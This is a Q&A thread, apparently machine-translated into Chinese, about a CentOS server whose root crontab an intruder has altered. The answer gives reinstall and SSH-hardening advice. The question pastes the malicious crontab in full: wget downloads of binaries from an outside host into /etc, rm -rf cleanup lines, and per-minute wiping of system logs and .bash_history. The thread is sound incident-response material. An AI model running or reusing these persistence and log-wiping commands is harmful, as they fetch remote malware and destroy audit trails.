CentOS被黑客入侵，crontab已被修改

Question

我相信我的CentOS中有人/病毒入侵，我最近打開SSH一天。盒子在局域網中。當我在外面時，我只需要使用它一段時間。

那天晚上，linux在局域網中通過SSH訪問變得緩慢，並且打開任何本地網頁的速度很慢。這表現很奇怪。我檢查有時非常高的CPU。所以我檢查了crontab。它已經改變。

有一堆這樣的東西：

20 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd 
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd 
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd 
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd 
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd 
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx 
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd 
*/120 * * * * cd /root;rm -rf dir nohup.out 
*/360 * * * * cd /etc;rm -rf dir atdd 
*/360 * * * * cd /etc;rm -rf dir ksapd 
*/360 * * * * cd /etc;rm -rf dir kysapd 
*/360 * * * * cd /etc;rm -rf dir skysapd 
*/360 * * * * cd /etc;rm -rf dir sksapd 
*/360 * * * * cd /etc;rm -rf dir xfsdx 
*/1 * * * * cd /etc;rm -rf dir cupsdd.* 
*/1 * * * * cd /etc;rm -rf dir atdd.* 
*/1 * * * * cd /etc;rm -rf dir ksapd.* 
*/1 * * * * cd /etc;rm -rf dir kysapd.* 
*/1 * * * * cd /etc;rm -rf dir skysapd.* 
*/1 * * * * cd /etc;rm -rf dir sksapd.* 
*/1 * * * * cd /etc;rm -rf dir xfsdx.* 
*/1 * * * * cd /var/log > dmesg 
*/1 * * * * cd /var/log > auth.log 
*/1 * * * * cd /var/log > alternatives.log 
*/1 * * * * cd /var/log > boot.log 
*/1 * * * * cd /var/log > btmp 
*/1 * * * * cd /var/log > cron 
*/1 * * * * cd /var/log > cups 
*/1 * * * * cd /var/log > daemon.log 
*/1 * * * * cd /var/log > dpkg.log 
*/1 * * * * cd /var/log > faillog 
*/1 * * * * cd /var/log > kern.log 
*/1 * * * * cd /var/log > lastlog 
*/1 * * * * cd /var/log > maillog 
*/1 * * * * cd /var/log > user.log 
*/1 * * * * cd /var/log > Xorg.x.log 
*/1 * * * * cd /var/log > anaconda.log 
*/1 * * * * cd /var/log > yum.log 
*/1 * * * * cd /var/log > secure 
*/1 * * * * cd /var/log > wtmp 
*/1 * * * * cd /var/log > utmp 
*/1 * * * * cd /var/log > messages 
*/1 * * * * cd /var/log > spooler 
*/1 * * * * cd /var/log > sudolog 
*/1 * * * * cd /var/log > aculog 
*/1 * * * * cd /var/log > access-log 
*/1 * * * * cd /root > .bash_history 

我可以看到我的/ etc /文件夾現在有這樣

srwsrwt 1 root root 1524643 Jan 31 21:06 atdd 
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 atddd 
srwsrwt 1 root root 1258750 Nov 24 14:22 cupsdd 
-rwsrwsrwt 1 root root 1258750 Nov 24 14:22 cupsddd 
srwsrwt 1 root root 1524643 Jan 31 21:06 ksapd 
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 ksapdd 
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 kysapdd 
srwsrwt 1 root root 1524643 Jan 10 20:06 sksapd 
-rwsrwsrwt 1 root root 1524643 Jan 31 21:07 sksapdd 
-rwsrwsrwt 1 root root 1524643 Oct 24 04:55 skysapd 
-rwsrwsrwt 1 root root 1524643 Jan 31 21:07 skysapdd 
srwsrwt 1 root root 1524643 Feb 5 17:26 xfsdx 
-rwsrwsrwt 1 root root 1524643 Feb 5 17:26 xfsdxd 

發生了什麼事在紅色多個文件夾？我能做什麼？

Answer 1

一旦發生這種情況，只有完全重新安裝機器才能解決問題。特別是如果這是root用戶的crontab文件。

如果你真的想看看是怎麼拿到的人在，如果他們沒有植入根工具包，那麼你可以評論，就像的/ var日誌/日誌/安全，尋找sshd的條目。

但是，如果您的root用戶已被入侵，唯一有意義的是完全重新安裝。

在未來，你可以通過做一些聰明之類的東西儘量減少ssh訪問的問題：

1. 不允許通過SSH密碼登錄...只允許基於密鑰登錄。這意味着只有在其配置文件中擁有正確私鑰的人才能登錄。

2. 不允許直接root登錄（即使使用密鑰）並要求通過sudo完成所有root訪問。然後，您可以通過安全日誌分辨哪些用戶已使用root訪問權限。

3. 如果可能的話，通過iptables將開放的sshd端口限制在一個源IP地址範圍內，而不是全部開放。

4. 將SSHD設置爲在另一個端口上進行監聽，而不是從外部監聽22（您可以非常輕鬆地偵聽端口22和另一個端口）。此步驟不會阻止正在主動掃描ssh端口的用戶，但會阻止僅查看端口22的自動掃描。

5. 您也可以考慮設置需要共享證書才能連接到整個局域網的VPN。 OpenVPN是這樣做的一種方式。許多路由器也可以做到這一點。然後，您可以通過VPN訪問您的局域網，並且不會將每臺服務器直接暴露給Internet。